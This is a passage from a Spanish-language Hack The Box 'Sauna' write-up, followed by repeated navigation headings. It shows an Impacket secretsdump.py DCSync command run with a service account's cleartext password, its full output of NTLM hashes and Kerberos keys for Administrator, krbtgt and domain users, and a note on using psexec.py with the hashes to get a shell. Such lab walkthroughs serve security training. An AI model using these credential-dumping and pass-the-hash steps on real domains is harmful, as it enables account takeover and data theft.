28
29
30
31
32
33


root@aoiri:~/tools/impacket/examples# python secretsdump.py svc_loanmgr:'Moneymakestheworldgoround!'@10.10.10.175
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:ba6af99033d007cdc1a1fbff2af7c4e7:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0
Administrator:des-cbc-md5:19d5f15d689b1ce5
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:69c8e51b35b01f1a8ab165234d674ab739770549b8741e176f51a75780a8bfe2
SAUNA$:aes128-cts-hmac-sha1-96:8d7e85b92a9930e14eb79b15519775a1
SAUNA$:des-cbc-md5:fea201988a20bf46
[*] Cleaning up... 

Psexec.py

Logramos obtener los hashes del usuario Administrator, utilizamos psexec.py con los hashes que encontramos para obtener una shell y nuestra flag root.txt.

Hack The Box - Sauna

Informacion de la Maquina

NMAP

NMAP LDAP

USER - FSmith

SMBMAP

EVIL-WINRM

USER - svc_loanmgr

PRIVILEGE ESCALATION

Bloodhound

Psexec.py

HTB: Sauna

Hack The Box - Sauna

Informacion de la Maquina

NMAP

NMAP LDAP

USER - FSmith

SMBMAP

EVIL-WINRM

USER - svc_loanmgr

PRIVILEGE ESCALATION

Bloodhound

Psexec.py

Read other posts

HTB: Sauna